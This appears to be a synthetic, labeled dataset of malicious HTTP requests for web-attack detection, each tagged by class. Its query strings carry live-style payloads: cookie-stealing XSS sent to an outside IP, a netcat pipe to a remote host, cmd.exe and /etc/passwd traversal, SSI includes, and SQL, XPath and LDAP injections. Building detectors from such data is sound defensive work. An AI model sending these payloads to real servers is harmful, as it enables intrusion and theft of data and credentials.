GET /af5stenbe98/tetteoieacatLblev/pUhs5sOmdmN6lgK/qmR@wrq0ZHFgSg.LhR/iLiV2HzXq9xK.exe?@5Jnevwget02O=6dsmdtS&dlyeooAtrhd=div%3Co&FB2BE07q6httpphp=so94%5Dhsr%29fetapynph-lcopy&nb7xiq6khihiL=81&7JE4inFAM=431&3rfRi=65978526&etimw8=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eawosi=r9i&tDets6hoEa6xsoR=ne1monicd%2F-exp_&bCLHtY0aWsGm=41&sveeaca9qbR6Y=aMz&li=ldivns%7Eboot.iniletnee&inNes=950623212&hnsvctssg=+nr&hheEernten=dwxd4Sa5d HTTP/1.1
Host: 208.103.126.93
Connection: close
Accept: audio/x-wav;q=0.5, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 88.4.33.9
Cookie: aeoea9s=noaM;hr=yGU;FOOQfrom.Z_8=hetihahn
Cookie2: $Version="375"
Date: Thu, 10 Nov 05 18:07:01 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: h2tit=i1adelef
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sat, 15 Apr 06 15:08:10 CET
If-Unmodified-Since: Fri, 12 May 06 01:57:26 CET
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: *
If-Range: Tue, 29 Dec 09 11:28:05 CET
Max-Forwards: 1198
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: 33-,197469-1
Referer: http://5eHlie.de/gZo7s6/ie8re.jpg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: xrRarEqr (a@Tqxp; qDR-GY4GB.; 2HxVP@1X; 041NhMvFF)
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.5 54.164.211.49, 1.6 www.bfPaT.js
Transfer-Encoding: gzip
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37797
Start - Id: 47187
class: XSS
GET /0d7_4HcQ_Yg/i5F5y0a1D@.EqmT/q6NCYPJdZloPnQ/rx5K2B/s2ldt4unrieufeaeiine/eJhawoCqRtfgVTFiMzVz/kf/PY3foIhlike/y63P/atctotiHrusalCto.php4?wepaoW5o=99899390&0oese4tNusrdmd=%26%7B%5Bwindow.open%28%27http%3A%2F%2F173.142.144.195%2Fde.mspx%27%2Bdocument.cookie%29%3B%5D%7D%3B&group byY5ZHCc97@p=17753&intmkhe=Onjeti4okedp HTTP/1.0
Host: www.a7il.fr
Connection: 3feip
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.1
Accept-Language: an0e-V;q=0.1, sa-oHuu
Cache-Control: max-age=658
Client-ip: 65.151.77.8
Cookie: hods=/y;u9etc9e2=it2oEnpewrIi9pOrg
Cookie2: $Version="93"
Date: Mon, 10 Apr 06 12:23:53 CET
ETag: W/"bo.SFw@Le2qxDYl"
Expect: 100-continue
From: oeDi@asaha.net
If-Modified-Since: Mon, 22 Nov 04 10:30:00 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:17:21 UTC
If-Match: "KpN0d.NNBWyf3Np.O"
If-None-Match: *
If-Range: Thu, 27 Sep 07 22:47:24 CET
Max-Forwards: 11
MIME-Version: 3.0
Pragma: uva='di'
Proxy-Authorization: NTLM T2VlYWplZW9rdGVpdHRncmVTZnM1ZWVubWZqaWpuYWJw
Authorization: Digest cnonce="6a5heybr"
Range: 671-463
Referer: http://oflnioo.biz/aisve/mw4p/inottgss.pl
TE: trailers,trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (compatible; in2EsohsN; Open BSD i586; saOai; shi4neeh6; 6byv6wsN)
UA-CPU: Sparc
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: HTTP/1.5 www.ersai0tP.htm
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47187
Start - Id: 44877
class: PathTransversal
GET /wp-ODK_adminIJoE.aspx?sltoursaeh=i0ansdelete&aoleviey=ctae&zi=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&pMPaCjZxtermZ=leEuao3be&bcPi=19782225 HTTP/1.1
Host: www.pRlbejteIJ.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: v-tlb;q=0.9, ld-1h, zky0sn-odap, dmKac-behn;q=0.7
Cache-Control: no-store
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Tue, 06 Apr 10 13:28:51 GMT
ETag: "udDi1mJbf1wg0EaH"
Expect: ritRee
From: reecos@eeesftcx.gov
If-Modified-Since: Thu, 14 Oct 04 01:47:41 CET
If-Unmodified-Since: Mon, 10 Sep 07 07:07:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Jul 09 20:21:11 UTC
Max-Forwards: 21
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: E6i4en cnemics=iaikur
Authorization: NTLM c2hFbXNEbHNvZGEzd2VmbnNldHR5c28zbG9yZWNzaXJkb2VoYW5wcGhtZ2FvbWM=
Range: -41,56231-,-8575
Referer: http://icsiz.org/aTel/28LAizw/8err0bma/em9lcohc.sh
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Mozilla/2.4 (X11; U; Unix 2.9; os-eo; rv:4.3.1) Gecko/46151836
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: 4.9 www.rgah.html, 3.1 63.170.190.107:4, 4.8 www.G6selin.shtml
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44877
Start - Id: 48876
class: XPathInjection
GET /P2BU3Dxm/HvbscriptucOgEQ/e8gT.k.pX_vV11go2kX/sam8v3IJBBdW/wp-L7g/tldafeo7unu/c7jy/aQOdPYC@WPow/a8VvZ/ewahe/csgumCJ1JNrv2d.dll?ordeeLa=pbetdIvbscripte+drm%3DU0noe&2yasdzwjueht=eafwgRpudaahaee&egeshnnold=nsi0eeteheurenairo&9caiGnheafb=oFke&dc2d5otlex=+cs&nwliia7naqboNe=sN&xaeryedXiryo=rdeb&rRZA=thtw-P1IOZ9&@L.samjUqfs=wtticpt%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27iuyyetsa%27%3D+%27&hCegsmi4awh=sEicvondshs&aiietek3bntiat=37147&tt8yCfnr5=5990740&wohoi=9860566&uAruosas=3491&4samUttmpM@=Oenif%25a HTTP/1.1
Host: 90.94.121.2:614
Connection: close
Accept: image/*;q=0.1
Accept-Charset: x-mac-cyrillic;q=0.4, big5;q=0.4, us-ascii
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: 7dEw7=Odt
Client-ip: 81.197.139.145
Cookie: bgsoundFErftpetcdocumentD=4382346007
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 10:29:52 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: 100-continue
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 03 Oct 09 03:54:49 UTC
If-Unmodified-Since: Sun, 11 Oct 09 22:42:21 UTC
If-Match: *
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: Wed, 11 May 05 17:59:05 UTC
Max-Forwards: 197
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 5-,-65438
Referer: /Mitu/sfaer/tdDi.php3
TE: chunked;q=0.2
Trailer: Accept-Charset
User-Agent: Mozilla/8.8 (X11; U; SunOS sun4u 4.1; eT-e6; rv:3.9.5) Gecko/71741520
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: ei8/0.5 191.70.182.30, FTP/5.5 www.yvgdtjcc.jpg
Transfer-Encoding: compress
Upgrade: sot/2.1, durd/1.9, 3esnsy/4.2, ocnwu/9.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48876
Start - Id: 44321
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.1hengc.ch
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.7, windows-1257, koi8-r;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 150.122.198.96
Cookie: aiY0ea9ltc=403273;amrnprmoa=auwer;e2l4TcYstnnai=o5oga rupdate;wQRvC=elio
Cookie2: $Version="7"
Date: Sun, 08 Feb 09 05:03:30 GMT
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: Tue, 06 Mar 07 01:39:17 UTC
Max-Forwards: 019
MIME-Version: 1.6
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: NTLM dXY5c2NobmNSZ2NhMGFpbmJ0dHhyMGlrRWFEbzNnaHRtZQ==
Authorization: Basic ZmRSZW06ZXl0Zw==
Range: -4,244872-
Referer: http://heag.gov/a9hT/cNeSefoy.pl
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 8.0; nu-Ih; rv:5.4.0) Gecko/07569434
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44321
Start - Id: 35712
class: XPathInjection
GET /tz/dvvAky7fqS3/se5anltsttoeoemxr/lDEqiJZwHA7QI/r0Gn-.nsf?aune=m1KftKvsqjm&8onooa9ein=1859&fStmehel=807&shedna1h=oNlx8v&oee2i5ut0vtiiN=nhe&lteetewHf=a&yN4ZKOqexecacceptv1=4391++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++3755%3D&rN=18506&J64J-Apassthrup=gsanesO7+&9AQ7_=7%2F%294&2replace3B=58847&reosulhrikhreoh=1258922592&mdl=1 HTTP/1.1
Host: www.e1ev.fr
Connection: keep-alive
Accept: application/*, audio/*;q=0.1, audio/*;q=0.6
Accept-Charset: x-mac-greek, iso-8859-6;q=0.4, iso-10646-ucs-2;q=0.1, iso-8859-4;q=0.3
Accept-Encoding: 
Accept-Language: oece-nc, eTae-9los;q=0.1, ur-aetsznn;q=0.3
Cache-Control: no-transform
Client-ip: 144.129.84.108
Cookie: suctdehsisY=9o= 
Cookie2: $Version="64"
Date: Mon, 29 Nov 04 21:36:36 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sun, 01 May 05 15:12:17 UTC
If-Unmodified-Since: Sun, 26 Jun 05 11:12:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: Digest nonce
Range: 5225-,8-9,1-
Referer: /slmah/etcl/kvlce.asp
TE: trailers,deflate
Trailer: TE
User-Agent: Mozilla/1.4 (compatible; Konqueror/7.1; Open BSD i386; SaeO9e; Easpwhs2; trhi)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: 1.3 103.119.96.38
Transfer-Encoding: gzip
Upgrade: d3ec/2.6, tifat/9.6
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35712
Start - Id: 38454
class: LdapInjection
GET /0MVa/basipnttoeruy3o/srrolaeaeooIsLtro.bin?fcashtulisiifi=%29%28+++%7C+%281le%3Dg7*%29&7nsseETsbstTsh=95 HTTP/1.1
Host: 243.68.17.85:80
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: seaI-eO, eru-0o2tsa;q=0.3, e-edtHtiea
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Wed, 12 Mar 08 21:59:47 UTC
ETag: W/"DYNYlE_..-0XtO8cK"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Tue, 14 Jul 09 01:11:48 GMT
If-Unmodified-Since: Wed, 22 Dec 04 13:30:51 UTC
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: *
If-Range: "viw1wKSEZ6Drswu3r"
Max-Forwards: 921
MIME-Version: 3.3
Pragma: 9='tGl3bE'
Proxy-Authorization: Digest realm
Authorization: NTLM bWU4OGNvNnNOOXJ1d3FOOW9oYXFmcjNvcm1hb3FlbGMzYXRhZWRydGV0M0E=
Range: 283-,-1,-786
Referer: http://tsh8g.cz/tiCmt7/f0tw/k62s/twof0/c3pFsAp.php
TE: trailers
Trailer: If-Match
User-Agent: ena2oitdbpasagmte
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 2.4 www.oaneeeyt.gif:88210, refeaA/2.6 www.iOgN.html
Transfer-Encoding: identity
Upgrade: Sao/2.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38454
Start - Id: 39778
class: SSI
GET /pZe1m1qK_kK/lYriS4WXq4.jpg?olinkB_G8n=rpcUxIsaUlnF&g7i=4466777&7ps3zPpwj5admin-exec=%2FEvs+&d1ee1oyhnrtire=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&Dwgertid=crnbKlee6soqbhgo&eoiItbea=i%25u%2FlTnhsk HTTP/1.0
Host: 53.69.20.93
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-japanese;q=0.1, ks_c_5601-1987;q=0.9, iso-2022-jp, macintosh
Accept-Encoding: identity, identity, identity;q=0.4, gzip;q=0.9
Accept-Language: 8nwrsoum-ck
Cache-Control: max-age=055
Client-ip: 211.6.11.10
Cookie: ctzAfnetentrx=oo$;tstg=487642;2A8V=(lm;d /\ydaPrbselecta;yleaems=inputA%a roahttpsatprocessing-instruction?o;
Cookie2: $Version="35"
Date: Mon, 01 Oct 07 13:53:06 GMT
ETag: "O2zS3ZgOhFCZnK6j_ohM"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Sun, 03 Dec 06 09:21:24 CET
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: "Z3npkwj.LoKh@3Dm"
If-Range: Tue, 04 Aug 09 15:24:28 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: ulerr='xdFetH'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Basic RWV3b24xdDo2bEhjcm8=
Range: 2208-72
Referer: /tats/hhNr9/tpaot9/gbut.cfm
TE: gzip;q=0.8,deflate,trailers
Trailer: Trailer
User-Agent: oOtZI.1O http://www.d2ehos.fr
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 4.1 www.oaie.htm
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39778
Start - Id: 46194
class: PathTransversal
GET /pg7rnpna/LTJpJmT4sAGE/jUqqhdihs9ECehhdssi/whwLozaZwtH.LX3d2uwR/oedbbea8hyfC/truoblSSa/hZbj_w59/5boqcl/iZr2dvB/n58_BZS3Jpg6n.pl?w0ep8osfh4alt=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FpelE.conf&awWB.=tt4a6trEewtse&ahit4qieeeue4c=t.Najg&roe=eetpeztatfu&tHaGGCY48fsa=cs HTTP/1.0
Host: www.bpowm4af04.uk
Connection: 9nufcd5h
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad, x-mac-turkish;q=0.5, x-mac-arabic, iso-10646-ucs-2
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: oSs=a
Client-ip: 158.116.5.64
Cookie: imnzm=hu7N;oha2qeiyyewth=hzRCkGwFdA3;oCDg5=@@bp;owtMn5pes1xYm=44;etswaoteht=tIdRbljVYK6z
Cookie2: $Version="988"
Date: Sun, 18 Oct 09 10:29:11 UTC
ETag: "gKxZOaLRu1jDtbWY"
Expect: iRelgetf
From: sloo@sd406oko.ch
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Sat, 28 Jan 06 12:20:51 GMT
If-Match: "pv2eHXEXrNBXFRj1Szr"
If-None-Match: *
If-Range: "kMrRzj1VdIWejPY"
Max-Forwards: 097
MIME-Version: 2.5
Pragma: jba='f'
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: Digest uri=http://aaee.org/ibe6m/nmena1NM.doc
Range: 3-60707,6378-,-00133
Referer: /zes7/g1ithv/uaIef0ta/g9aEtaal.zip
TE: trailers
Trailer: Accept-Language
User-Agent: uiOhrw (0htIGGe; mtA8TO.cR; wrK70MA_; r3yAH-mIz)
UA-CPU: MIPS
UA-Disp: 411,052,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 214.77.125.123:174, 6.5 www.hehdf.tiff:6177
Transfer-Encoding: compress
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46194
Start - Id: 42603
class: SqlInjection
GET /sjbnWGjSM_i/ieweekiuyhkjt/96VS4lLMHRhBk08x.htm?bwTiataciTlt5=%24egingot%5C6%5Bbya&esw=3pq&nrk=eUq-Zw55.5&YX_TVC7tV=toWwatslfsbl&o1aohitNrro=h&iWAbBhJ7Iisam=aPHl&sethmSie=eitedLxhtaiah2ruw&httpsptYoqc@Kw3.=%27++++%29+++++UNION+ALL+SELECT+04445++++FROM+++++aaegi8++WHERE++%28++++%27%27+++%3D+%27&u6a=n3p&pesereivein=cey%2Fnso7eRandwget HTTP/1.0
Host: www.9bsbmmh.de
Connection: keep-alive
Accept: text/*, application/x-tar
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip, gzip;q=0.1
Accept-Language: *;q=0.6
Cache-Control: max-age=70
Client-ip: 8.13.145.39
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="813"
Date: Sun, 07 Jan 07 24:26:49 UTC
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: ioed@oROvlcftKp.biz
If-Modified-Since: Sun, 20 Dec 09 18:02:03 CET
If-Unmodified-Since: Sat, 11 Jul 09 24:41:19 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Mar 09 15:51:11 CET
Max-Forwards: 77
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM YTd1cm9jYW5penRTaGxzYWhobG9vaXRyODRnbXRpaUxTZEVTcA==
Referer: /waddt/myhC.php
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: dqmlryre
UA-CPU: Sparc
UA-Disp: 4133,8176,16
UA-OS: Win98
UA-Pixels: 4720x346
Via: HTTP/1.3 185.219.3.188
Transfer-Encoding: identity
Warning: 267 www.y0jts.jpeg "ejet0ree7anPerso" 
X-Forwarded-For: 35.161.132.69
----: -----------

null

End - Id: 42603
Start - Id: 41836
class: SqlInjection
GET /rZm@o/TsnhocILtQn9/td7TGj.cfm?aecgrtry3teorai=%3B+exec++++get_cust%28++%27x%27%27+union+select+object_name%2Cobject_type%2C%27%27x%27%27++from+++user_objects+++where+++++%27%27h6hneseDr%27%27%3D+++%27%27+++%27++%29%3B&rSb=261 HTTP/1.0
Host: www.olkdgwcjsn.org
Connection: gWdsIao
Accept: application/postscript;q=0.5, text/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: mqhuf-aTym;q=0.8
Cache-Control: only-if-cached
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Mon, 31 Aug 09 12:33:10 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Mon, 07 Mar 05 04:57:19 UTC
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM ZWl0OGdOYWRhbWV1cnRndWcxbnNsdDhvaGdlY2NzdGV5cG1laWFleWlvczZt
Range: -0842
Referer: http://www.z6tlh6.org/wnchEn/ciuhs0h/q64Eih90/Rsco.js
TE: trailers
Trailer: Max-Forwards
User-Agent: 78ynegbem/4.2.3.4
UA-CPU: 68000
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: deflate
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41836
Start - Id: 36761
class: OsCommanding
GET /59un/rw0usrn11rRe/liPscn/aduThouueatotEseaaa/aI7ca/wuRQY/aQomlINRKEa/8OzVKAeuXWAY/9include9TDwkC6KF/skecoUvj.js?twhririo3ore=%7C++++%2Fusr%2Fbin%2Fnc++-vvv++++156.83.222.141+++++80%2500&teji5=6128318 HTTP/1.1
Host: www.itnu.fr
Connection: MEsaminm
Accept: image/gif;q=0.4, image/*;q=0.1
Accept-Charset: iso-8859-7, big5;q=0.7, macintosh;q=0.1, gb2312, windows-1257;q=0.4
Accept-Encoding: 
Accept-Language: hioc8emd-ott;q=0.4, eeEj2ai-ir;q=0.7, 56tsair-nee6drnO, tre-u
Cache-Control: min-fresh=9050
Client-ip: 130.81.190.203
Cookie: ob=116772;tvebRySDodTu=te gr9at n;0ha=098;aMFortt4Wet=twmvma9eRdTQ6nbug
Cookie2: $Version="576"
Date: Fri, 18 Jan 08 11:23:37 CET
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Tue, 04 Nov 08 19:30:21 CET
If-Unmodified-Since: Wed, 20 Aug 08 13:49:26 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "ljlX7WAzTSP.gtyEI"
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Digest nc=ee6EFDD0
Range: 8-,6-50
Referer: /sii2I.swf
TE: trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 7.7; rb-yt; rv:1.4.9) Gecko/91732251
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.3 171.95.238.220
Transfer-Encoding: deflate
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36761
Start - Id: 45553
class: PathTransversal
GET /mha4QSm0LVtvlMBhY.c/h8lfhentmniTurf0Rv/eQKu9Y/XTvarEV/ecvMAuFLLu5-Ii.html?Fay0sn7=aom%3E%27c%5Bs+l&H4aa=%7E%3Bh%3E&NQ0azyCQ=homerr%40syl&n8psSyie=5885251&3e.Yo=aianiceXnttueloier&me=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&GYrenpreplaceHt6select=co8n&BGYtxKrcpn5nET=o8lbYcDBU&ah5eR1trf6yl7i=53992356&danogtbBNiefwl=m%40etbintelnet21+cselectng%24%3Cn&EpuwI3o=3uc9xlqkO&edhnm=%2Fesoemheleoo HTTP/1.0
Host: www.khhu.be
Connection: keep-alive
Accept: video/*, audio/basic
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: sibp-rf, en4rue-sY, u-hhos;q=0.6, wkd-eh2ii
Cache-Control: min-fresh=223
Client-ip: 15.78.136.11
Cookie: lnssFaaSxbgbsa6=21811858;ukS=gFhb;ndoNmrtqi=7249;ebuincusleia=u2orotireaT'9i;QVVEaQ90bK5D=62909356
Cookie2: $Version="087"
Date: Thu, 20 Dec 07 04:10:10 CET
ETag: "T1-L@QiGHQrrvjVT2"
Expect: urperzok
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: "0Ex2oAaDb_GQ1k03-"
If-Range: *
Max-Forwards: 5379
MIME-Version: 3.3
Pragma: roaxneqa='n4fxjtd'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: http://www.asnioqm.fr/rsioc57a.mpg
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: cEVHLpACv http://www.0oietiif.de
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
